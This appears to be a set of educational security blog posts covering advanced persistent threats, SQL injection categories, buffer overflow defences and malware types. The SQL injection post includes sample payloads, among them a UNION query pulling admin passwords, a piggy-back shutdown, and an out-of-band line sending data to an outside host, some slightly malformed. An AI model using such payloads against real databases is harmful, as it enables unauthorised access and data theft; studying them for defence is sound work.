Have you heard of Advance Persistent Threat or APT?

Introduction

Advance persistent threat (APT) is a term referring to organised, targeted attacks on government organisations, officials and businesses, to steal valuable information and / or to cause damage to assets. These attacks require a high degree of knowledge and the attacks usually occur over a long period of time.

To understand an APT, it is important to look at the definition of each word: advance, persistent and threat. The keyword “advance” implies that the attacker has a high degree of knowledge that allows them to use large pool of intrusion tools and techniques. The keyword “persistent” is used to describe that the attacks are guided and usually occurs over a long period of time. And lastly the “threat” implies that a human is involved in the attack rather than the automated tools. (1)

The first section describe the characteristic that an attack must have to be considered as an APT. The section two describes the life cycle of an APT attack. The section 3 describes some of the measures that could be taken to defend against APTs, these actions are based on the behaviour at the beginning and later stages of an attack.

1. Characteristics of an APT

An advance persistent threat attack has 3 main characteristics. They are targeted, complex and persistent in nature. The following paragraphs describe each characteristic in detail.

Targeted: APT attacks are targeted to a specific company or a person to achieve a specific target. For example, Stuxnet (2) was specifically targeted to Iran nuclear power station. Night Dragon was targeted at oil and petroleum companies. RSA attack targeted to gather information on RSA SecureID (2). Aurora operation was targeted to steal source code from Google, Adobe and other high profile companies. These are unlike opportunistic attacks thate usually see from the hackers. But rather well organised, well-funded attacks that are targeted to achieve a specific objective. It can be assumed that any company or organisation with a high value data could be a target.

Complex: APTs usually involves a mixture of attacks, attempting to penetrate the network using different techniques. These may include, sending phishing emails to targeted individuals, targeting vulnerabilities in applications, targeting unpatched system, and zero day vulnerabilities. It is to be noted that to defend against these complex attacks a defence in depth strategies should be deployed.

Persistent: APTs mainly occur over a long period of time. As the attackers have to gather information about the target and develop specific attack strategies, involving finding zero day vulnerabilities and development of their own tools for the specific vulnerability in the system. Moreover, once the attack penetrate into the network, they may still find lots of obstacles to overcome in order to reach their target. These usually span over weeks and months.

2. Stages of Advance Persistent Threat

APTs consist of the 4 major stages (please note that different authors further divide stages). Each stages may take long period of time.

  • Reconnaissance: during this stage the attacker is attempting to understand the target and its vulnerable points.
  • Penetrate: using the information gathered from the previous stage, thettacker gains access to the target system.
  • Persist and propagate: once the attacker gains access to the network, he installs, backdoors and further propagate into the network.
  • Data Exfiltration or take action: once the attacker reaches the targeted objective, they have to extract data from the target or do harm to the system.

The following sub section looks at each of the stage in details.

2.1 Reconnaissance

This is first stage of an APT. At this stage, the attacker gathers information about the target. This stage is mainly divided into two sub stages: passive scanningnd active scanning.

Reconnaissance is also referred as passive scanning. During this process the attacker finds information about the target by looking at blogs, job seeking posts, and corporate website. These sources can include information about network devices, software’s including anti-viruses, staffs and their roles and technical contact numbers of the target.

Scanning may involves using automated tools (such as nmap, nikto) to identify potential hosts that could be targeted, they look for ports that are open, and different services running on the host. It is to be noted that automated scanning is noisy, and attackers use other attacks to hide a scanning process. These may involve a dos attack on the hosts, so that the logs are over written.

2.2 Penetrate

Once the attacker finds a potential host which is vulnerable, many targeted attacks will be deployed to infiltrate the host. These attacks may involve using social engineering techniques, spear phishing emails, and using zero-day vulnerability malwares. It is to be noted, these attacks are developed specifically for the targets and are designed to evade the anti-virus and intrusion detection systems that are in been used by the target.

2.3 Persist & Propagate

Once the attacker has infiltrated the system, special measures are taken by the attackers to maintain the access to the system. Some of the measure they take involves:

  • Installing special software (remote-access software) to implement the communication between infiltrated host and attacker
  • Creating administrative users and taking copies system password hash files
  • Hiding the presence of them in the system, by deleting system and firewall log files

After taking measure to maintain access to the infiltrated system, further payloads are downloaded into system for running scans, and identify other nodes on the network. This helps the attacker to map out the network and find the next system to be penetrated in order to reach the target.

This movement from one system to another to reach the target is referred as “pivoting”. It is important to note that propagation phase may take weeks and months on itself, as further reconnaissance and penetration stages occur during pivoting from system to system to reach the target.

2.4 Data exfiltration or take action

At this stage, the attacker has control of one or more system on the target and has reached the final system or found the information the attacker wanted. Now the attacker needs to collect information and send it to outside server or to another system (assuming the attack goal is to get data or information). If the information gathered needed to be sent from time to time, this stage last for months and years, until the attack is detected and stopped. On the other hand, if this information is needed to be sent only once then the attack ends after sending data.

In addition to this, other actions that the attacker may take include (3):

  • Holding data for ransom
  • Information sold for potential buyers, for example, credit card information’s stolen from large retail shops are sold in black market
  • Sell or disclose the attack methods used in compromising the target
  • Disclose the information and data to public

Detection of APT

Advance persistent threat attacks occur quietly and are very difficult to detect, hence they may be in a compromised system for a long time before it is detected. So it is important to be on alert to identify any suspicious activity that could happen in any of the components on the network.

Some of the early sign of an APT may involve activities such as: 1) suspicious emails, 2) suspicious connections, 3) files containing shellcode, and 4) anomalous traffic. These actions could be detectable by antiviruses and intrusion detection system.

Since most APTs are detected long after compromise of a system, the intrusion detection systems should be on the lookout for activities that are carried after a compromise. Some of the activities that are involved in later stages can include, 1) data access attempts, 2) data transfers and 3) changes in application configurations.

Conclusion

Advance persistent threats are attacks that are complex, organised and targeted to a specific organisation or an individual. Although these attacks are been carried out by highly skilled hackers, it is going to change when APTs knowledge is spread among hacker communities. Hence more organisations are going to fall victim of APT attacks.

The key to defending an APT is to follow security best practices (such as defence in depth strategies), so that it would result in an early detection, reducing the impact of the attack.

References

  1. Damballa. Adavance Persistent Threats (APTs). Atlanta : s.n., 2010.
  2. Advanced Persistent Threats: A decade in review . Command Five Pty Ltd. 2011.
  3. Web Sense. Advance Persistent Threat and other Advance Attacks. 2011.

 

Advertisements

Do you know SQL Injection or you just think you know it?

That is the question with which the lecturer started. I wondered If I really know it too. So I am here writing what I know of SQL Injection, may be someone else could help me out with things that I get wrong or provide me with more insight in to the topic.

Introduction

SQL injection is an attack by which the attackers pass the sql statement from the client to the server for execution. If the sql statement is executed successfully, it may result in a data breach, leaking out information that the developer didn’t intend to show. In addition to this, the attackers can insert, delete or update rows in the database as well.

SQL injection attacks can be divided into few categories based on how the result of the statement execution or how statements are formed. Below are the categories of sql injection types, this article will look into.

  1. Tautologies
  2. Union Queries
  3. Piggy-back queries
  4. Timing attacks
  5. Alternative Encoding
  6. Out of band attacks
  7. Illegal/Logically incorrect Queries

Tautologies

This attack involves use of a boolean condition that results in either always true condition or always false condition

select * from users where username = 'abc' or 1 > 2 '

Above example always eavalute to true.

Union Queries

Union queries work by combining results from two separate queries, which takes data from different tables or view.

select * from users where userId = $id

The id value will be manipulated by the user by adding a union query

$id= 1 UNION ALL SELECT adminUsers, password FROM AdminUsers

This will result in the following query

select * from users where userId = 1 UNION ALL SELECT adminUsers, password FROM AdminUsers

Which gives combined result of both queries.

Piggy-back queries

Piggy back queries are queries appended to a existing query, resulting in more than one query in the statement.

select * from users where userId = 1; shutdown();

The above statement contains two queries, the developers could check for this type of statement before execution of the sql statement.

Timing attacks

Timing attacks are very helpful when the database and application error output is switched off. This is also part of blind sql injection. For this type of attacks the attacker appends a database timing function to the orginal query and verify if the timing functions executes or not, by checking the server response time. If the server responds immediately then the timing function is not working else the database is vulnerable to this type of attacks.

select * from users where userId = 1; sleep(15);

Alternative Encoding

In this type of attacks, the sql text is encoded to avoid detection by defensive coding. These types of attacks are hard to detect. But some of the keywords used in this approach cab be identified.

Select * from members where id=1 OR 'ABC' = concat(conv(10,10,36),
                            conv(11,10,36),conv(12,10,36)),1
Select * from members where id=1 OR 'abc' = char(97,98,99),1
Select * from members where id=1 OR ascii('a') = 97,1
Select * from members where id=1 OR ceil(pi())=4,1
Select * from members where id=1 OR floor(pi()*pi()+pi())=13,

Out of band attacks

This is also very helpful technique for blind sql injection attacker. The attacker could use a dbms functions to execute a command, which result in out of band connection, that passes results to the attacker. For example, the attacker could use this technique to emails user informations.

select * from users where userId = =10||UTL_HTTP.request(‘testerserver.com:80’||
(SELET user FROM DUAL)--

Illegal/Logically incorrect Queries

This is also known as error based sql injection exploitation. This type of attacks help the user when other types of attacks, such as Union queries are not helpful. It is also very helpful at reconnaisence stage of an attack, whereby attacker inputs illegal query to see the resulting output. This result may give information about the backend database system.

select * from users where userId = ' --

The above query will result in error message. To guard against this type of attacks the production database should have the error messaging swtiched off.

………………………….

There is one more type of sql injection called Stored Procedure Injection. For this type of attacks the parameters of the stored procedure are modified to get the results.

Hope this article is informative.

What is a buffer overflow?

Introduction

Buffer overflow happens when more data is written to a buffer, then it is allocated to hold. This extra data is translated to memory direction numbers, which is executed by a computer. A buffer overflow could crash the application, and also could be exploited by an attacker to execute any command they want.

Types of Buffer Overflow

  • Stack Overflow
  • Heap Overflow

Prevention Mechanisms

  • Use higher level programming languages that are strongly typed and disallow direct memory access
  • Canary (stack cookie) is a data pattern that is written to the stack just before EIP register (EIP contains the address of the next instruction)
  • Address Space Layout Randomization (ASLR)
  • Data Execution Protection
  • Stack Canary/Cookie

Malware – an introduction and classification

Malicious software, or malware refers to programs that exploit vulnerabilities in a computing system for a harmful purpose. These malicious programs can be differentiated into categories based on their behaviours or functions. For example, based on whether they require a host program or not, or by identifying if the software copies itself or not. In the following section I will look into main categories of malware.

Virus

A virus is a piece of program code, which is self-replicating and inject itself into installed programs in the system. These types of malware can be further classified into 4 types

Resident Virus: This type of viruses embeds themselves into the memory of the target host. In such a way that, it becomes activated every time the OS start or executes a specific action.

Non-resident Virus: When executed this type of virus actively seeks targets for it to infect, either on local, removable or network locations. Upon further infections it exits, hence not residing in memory

Boot sector Virus: This type of virus targets specifically a boot sector on the host’s hard drive. Once infected, the virus gets loaded into memory every time an attempt is made to boot from the infected hard drive.

Macro Virus: Macro viruses are written in macro language, embedded in Word, Excel, Outlook documents. These viruses are executed as soon as the document is opened.

Worm

Worms are also considered a sub division of viruses, as they also self-replicating. Unlike viruses, worms exploit network and operating system vulnerabilities to spread. In addition to this, they do not require any interaction for replication process. This capability makes worm more dangerous.

Trojan horse

Unlike viruses and worms, Trojan horse does not have the capabilities of self-replication. These are programs that pretend to be legitimate, but are designed to carry out a malicious actions when run. These applications may come in forms of free software’s, games, videos, etc.

Backdoor (Remote Administration Tool)

A backdoor or a remote administration tool is a piece of software that gives a person access to a computer without the owner’s consent. Depending on the capability of RAT, the attackers can run or install software’s they need to cause damages.

Rootkit

A rootkit is a piece of software, which is designed to hide its presence and actions from the users and anti-virus software. It is able to do this via deep integration with the operating system. These rootkits starts before OS starts. Rootkits helps the attackers to maintain the root level access to the compromised system.

Bots and Botnets

Bots are software’s that are created to perform specific operations. While some of the bots are created for harmless purposes (such as video gaming, Internet auctions), it is becoming increasingly common to bots being used for malicious activities. Bots are used in botnets (which is a collection of computers controlled by third parties) for DDoS attacks, or as web spiders that scrape server data and for distributing malware.

Spyware

A piece of software that monitors victim’s activities and also gather other information from victim’s computer and sends it back to its creator.

Ransomware

Ransomware is a malware that is designed to extort money from its victims. It can appear as a pop up, phishing link, or malicious website, and once acted on, will trigger a vulnerability in the user’s system, locking out the keyboard and screen, and sometimes even the entire computer. It’s intended to scam people by falsely accusing the victims of a crime and asking to pay a fine.